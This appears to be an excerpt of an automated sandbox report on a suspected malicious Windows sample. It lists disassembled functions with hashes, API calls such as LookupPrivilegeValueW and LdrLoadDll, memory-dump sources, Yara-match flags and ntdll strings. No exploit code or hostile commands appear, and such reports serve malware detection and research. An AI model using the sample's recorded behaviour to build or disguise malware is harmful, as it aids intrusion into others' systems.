                                                                                                                                                                                                                      • Instruction ID: bfd17ffc50d23b40ef5dc54e758cd4915e16bcaf0e6c4707292e8240ed263ba1
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 60ed9ade43182fa001fbfa5a5a60bc594ea61892f31e01ce253290c628a76b2c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AA90022921340012E6807158940860A000587D2342F95D426A0019558DCD19896A6325
                                                                                                                                                                                                                      Function 00F82EA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 15e234c3248aad44b323831725ae225c62c730846c8405e1fadfa83d0a8662ce
                                                                                                                                                                                                                      • Instruction ID: 7c5a5826c17cee5d9f014094f61250637754f3a9e7e8ce44df4c683878abf7a3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 15e234c3248aad44b323831725ae225c62c730846c8405e1fadfa83d0a8662ce
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2790027120140412E64071588404746000587D1341F55C022A5068554F8A5D8ED67669
                                                                                                                                                                                                                      Function 00F82E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: 2df81d31ba4b57fbebe33fdff8b5d28dc3039ef384d472d36b97043aedfb3d7e
                                                                                                                                                                                                                      • Instruction ID: b555cb2c44a95a6111ef7a98cab6c6b6a9a09b5fc377f030b0696958461dfec5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2df81d31ba4b57fbebe33fdff8b5d28dc3039ef384d472d36b97043aedfb3d7e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E790022160140512E60171588404616000A87D1381F95C033A1028555FCE298A93B135
                                                                                                                                                                                                                      Function 00F82FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: c2de60ec6806fba3d3e61103b8cac5c8354ae45971c2b04565fd989e4d0c4c93
                                                                                                                                                                                                                      • Instruction ID: 88059bbbfae7fbf73cddfd1dd044be08e56c53d78eff3e7aaa06e891a8ce0645
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2de60ec6806fba3d3e61103b8cac5c8354ae45971c2b04565fd989e4d0c4c93
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 71900221211C0052E70075688C14B07000587D1343F55C126A0158554DCD1989626525
                                                                                                                                                                                                                      Function 00F82FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: f115d570c867fbc5c69ba4262c23c6371e47e4f189e9b61757f5fdba0bd4a681
                                                                                                                                                                                                                      • Instruction ID: e5d4127dab1df456a6b95fff064830f30bb821681961fe6f475c335e8089b9ab
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f115d570c867fbc5c69ba4262c23c6371e47e4f189e9b61757f5fdba0bd4a681
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 339002216014005256407168C8449064005ABE2351755C132A099C550E895D89666669
                                                                                                                                                                                                                      Function 00F82F90 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: fc655ec1928d0d55f8520bf0be681f6e2737825165b3a0d441e57c8e004352cb
                                                                                                                                                                                                                      • Instruction ID: 27be60848499a7bf466cb164f62f2a73ed1d38a9ff9cc843d268372907a83c07
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fc655ec1928d0d55f8520bf0be681f6e2737825165b3a0d441e57c8e004352cb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0390023120180412E6007158881470B000587D1342F55C022A1168555E8A2989527575
                                                                                                                                                                                                                      Function 00F82F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: a4068484046e8d7a948058d9d528f488713d8082b88cbb4d11d9b616d08cfa4a
                                                                                                                                                                                                                      • Instruction ID: caa31c3c7e4a47a6be6a6778f1f26d67c7269638d9a6bed7cdc96b283a4ac43b
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a4068484046e8d7a948058d9d528f488713d8082b88cbb4d11d9b616d08cfa4a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F990026134140452E60071588414B060005C7E2341F55C026E1068554E8A1DCD53712A
                                                                                                                                                                                                                      Function 00409AB0 Relevance: .1, Instructions: 92COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 9491f0743c91a206193bdf4875b0116748c1939b63dea1d6f13f2d0be6304ac3
                                                                                                                                                                                                                      • Instruction ID: 0cf1d1cfbff413d406b9f50454d57ab941c4b3e8ec75440de5a7d7d7e128ebbb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9491f0743c91a206193bdf4875b0116748c1939b63dea1d6f13f2d0be6304ac3
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24210AB2D4020857CB25D664AD52BFF73BCAB54314F04007FE949A3182F638BE498BA5
                                                                                                                                                                                                                      Function 0041A600 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 6 41a600-41a631 call 41af30 RtlAllocateHeap
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RtlAllocateHeap.NTDLL(6EA,?,00414CAF,00414CAF,?,00414536,?,?,?,?,?,00000000,00409CF3,?), ref: 0041A62D
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                                                                                                      • String ID: 6EA
                                                                                                                                                                                                                      • API String ID: 1279760036-1400015478
                                                                                                                                                                                                                      • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                                                      • Instruction ID: 226561cf9c8a986873ffc081809f26ad69fcc4b20f94c9d7be20fabd3b8eb7db
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 24E012B1211208ABDB14EF99CC41EA777ACAF88664F118559BA085B242C630F911CAB0
                                                                                                                                                                                                                      Function 00408310 Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 212 408310-40835a call 41be30 call 41c9d0 call 40acf0 call 414e50 221 40835c-40836e PostThreadMessageW 212->221 222 40838e-408392 212->222 223 408370-40838a call 40a480 221->223 224 40838d 221->224 223->224 224->222
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040836A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: MessagePostThread
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1836367815-0
                                                                                                                                                                                                                      • Opcode ID: 1eae49b1dd1fdf1f4ed343fddf3187855c82dbc596373200d6923005f005e771
                                                                                                                                                                                                                      • Instruction ID: 43d593e10ad008c4695c17d6314bf6f3e92d4c432431edd93db89b762a987e15
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1eae49b1dd1fdf1f4ed343fddf3187855c82dbc596373200d6923005f005e771
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E2018471A8032877E720A6959D43FFE776C5B40F54F05011AFF04BA1C2EAA8690546EA
                                                                                                                                                                                                                      Function 0041A791 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 243 41a791-41a79d 244 41a7a0-41a7ba call 41af30 243->244 245 41a723-41a727 243->245 249 41a7bf-41a7d4 LookupPrivilegeValueW 244->249 246 41a72f-41a744 245->246 247 41a72a call 41af30 245->247 247->246
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3899507212-0
                                                                                                                                                                                                                      • Opcode ID: 3a095b6fdbfae34f310b3791de5d0685201296881819b5ca00dc2e276e2191ab
                                                                                                                                                                                                                      • Instruction ID: 4f0e51a01ab46be95e7cd7a3d039ee2e35a66bd9743fa429f2e30aff352c1da8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3a095b6fdbfae34f310b3791de5d0685201296881819b5ca00dc2e276e2191ab
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B101ADB52102086BDB10EF59DC80DEB73A9EF88318F01845AF90957342C630E9168AB5
                                                                                                                                                                                                                      Function 0041A632 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 263 41a632-41a656 264 41a65c-41a671 RtlFreeHeap 263->264 265 41a657 call 41af30 263->265 265->264
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                                                                                                      • Opcode ID: f49230a00f39b622cdbf99e67a481b45ea0755e82c26f23a6924a4167ca151d4
                                                                                                                                                                                                                      • Instruction ID: ee930675011bf31697f300d8cbe35b02760f94f29c7344f56dc328e1a5823920
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f49230a00f39b622cdbf99e67a481b45ea0755e82c26f23a6924a4167ca151d4
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 15F039B1221204ABD718EF58DC49EE777A9FF48750F118669FA485B242D631E811CBA0
                                                                                                                                                                                                                      Function 0041A640 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                      control_flow_graph 266 41a640-41a671 call 41af30 RtlFreeHeap
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RtlFreeHeap.NTDLL(00000060,00409CF3,?,?,00409CF3,00000060,00000000,00000000,?,?,00409CF3,?,00000000), ref: 0041A66D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: FreeHeap
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3298025750-0
                                                                                                                                                                                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                                                                      • Instruction ID: 3f65de21c9b51a2b7742007d51c6b1fad19b07b0b1b2c98d2bb582ee848745b4
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1EE046B1210208ABDB18EF99CC49EE777ACEF88764F018559FE085B242C630F911CAF0
                                                                                                                                                                                                                      Function 0041A7A0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1D2,0040F1D2,0000003C,00000000,?,00409D65), ref: 0041A7D0
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3899507212-0
                                                                                                                                                                                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                                                                      • Instruction ID: a195d06a74d451d332e2306e76e7c3aa502b90bd3f16d73f11471c4c6d802808
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2FE01AB12102086BDB10DF49CC85EE737ADAF88654F018155BA0857241C934E8118BF5
                                                                                                                                                                                                                      Function 0041A680 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A6A8
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 621844428-0
                                                                                                                                                                                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                                                                      • Instruction ID: 026b6f0270740822b369349059f6971daea101c61a9fac8a7aff4918670f7806
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1D017726112187BD620EB99CC85FD777ACDF487A4F0180AABA1C6B242C531BA11CAE1
                                                                                                                                                                                                                      Function 0040ACE3 Relevance: 1.5, APIs: 1, Instructions: 11libraryloaderCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2212769489.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_400000_docs.jbxd
                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Load
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2234796835-0
                                                                                                                                                                                                                      • Opcode ID: 1ddec9c740a2b2ef97a035f25dfabd68456f20969e05435321587986678711db
                                                                                                                                                                                                                      • Instruction ID: 05bc5eed07a0c19d6aa88ef3f94ab0c5740ad5768756de9c93d4a761ab8051c3
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1ddec9c740a2b2ef97a035f25dfabd68456f20969e05435321587986678711db
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DEB09231A942182AEA74D6D89C06B2AB755DB85712F144296BD2CA67C0E4A22D2041EA
                                                                                                                                                                                                                      Function 00F82C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2994545307-0
                                                                                                                                                                                                                      • Opcode ID: b61f3cf6200f1af4a33e4bbd3929615671e8d8346c8f5e0be5e10e9365f1939f
                                                                                                                                                                                                                      • Instruction ID: 9e29f36098e58cbab66a1734697e1c9bd8d2675e909f204fca5d924a9df53a8d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b61f3cf6200f1af4a33e4bbd3929615671e8d8346c8f5e0be5e10e9365f1939f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D2B09B71D015C5D5EF51F760460871B790067D1751F15C072D2034645F473CD5D1F275

                                                                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                                                                      Function 00FC2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                      • API String ID: 0-2160512332
                                                                                                                                                                                                                      • Opcode ID: a28e66cb5d43058f4a8e003e64970352901367480a9736f3a3578d980294e140
                                                                                                                                                                                                                      • Instruction ID: 9e567d75716230914aae7c14a88539a6bf856803a1b605cab23a5a755382248a
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a28e66cb5d43058f4a8e003e64970352901367480a9736f3a3578d980294e140
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0B92AB71A04342AFD760DF24C982F6AB7E8FB84760F04482DFA94D7291D774E944EB92
                                                                                                                                                                                                                      Function 00F78620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • undeleted critical section in freed memory, xrefs: 00FB542B
                                                                                                                                                                                                                      • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FB54CE
                                                                                                                                                                                                                      • double initialized or corrupted critical section, xrefs: 00FB5508
                                                                                                                                                                                                                      • Invalid debug info address of this critical section, xrefs: 00FB54B6
                                                                                                                                                                                                                      • Critical section address., xrefs: 00FB5502
                                                                                                                                                                                                                      • Thread is in a state in which it cannot own a critical section, xrefs: 00FB5543
                                                                                                                                                                                                                      • Thread identifier, xrefs: 00FB553A
                                                                                                                                                                                                                      • 8, xrefs: 00FB52E3
                                                                                                                                                                                                                      • Critical section address, xrefs: 00FB5425, 00FB54BC, 00FB5534
                                                                                                                                                                                                                      • corrupted critical section, xrefs: 00FB54C2
                                                                                                                                                                                                                      • Critical section debug info address, xrefs: 00FB541F, 00FB552E
                                                                                                                                                                                                                      • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FB54E2
                                                                                                                                                                                                                      • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 00FB540A, 00FB5496, 00FB5519
                                                                                                                                                                                                                      • Address of the debug info found in the active list., xrefs: 00FB54AE, 00FB54FA
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000005.00000002.2213742805.0000000000F10000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_5_2_f10000_docs.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                                                                                                                      • API String ID: 0-2368682639
                                                                                                                                                                                                                      • Opcode ID: a641835451a4fff54772882f4b2214e0fdcf1fd8efa1d3c0921405222305a275
                                                                                                                                                                                                                      • Instruction ID: 59ac8b8a45c1e3c4c831c9a8f8a75194531404127740ae20c5f2da386e520040
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a641835451a4fff54772882f4b2214e0fdcf1fd8efa1d3c0921405222305a275
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CA81ABB1E41758AFEB20CF95D845BEEBBB5AB08B24F244019F508B7280C779AD41EB51
                                                                                                                                                                                                                      Function 00F729F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 00FB2624
                                                                                                                                                                                                                      • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 00FB24C0
                                                                                                                                                                                                                      • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 00FB2506
                                                                                                                                                                                                                      • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 00FB2412
                                                                                                                                                                                                                      • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 00FB22E4
                                                                                                                                                                                                                      • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 00FB2409
                                                                                                                                                                                                                      • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 00FB25EB
                                                                                                                                                                                                                      • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 00FB2498
                                                                                                                                                                                                                      • @, xrefs: 00FB259B
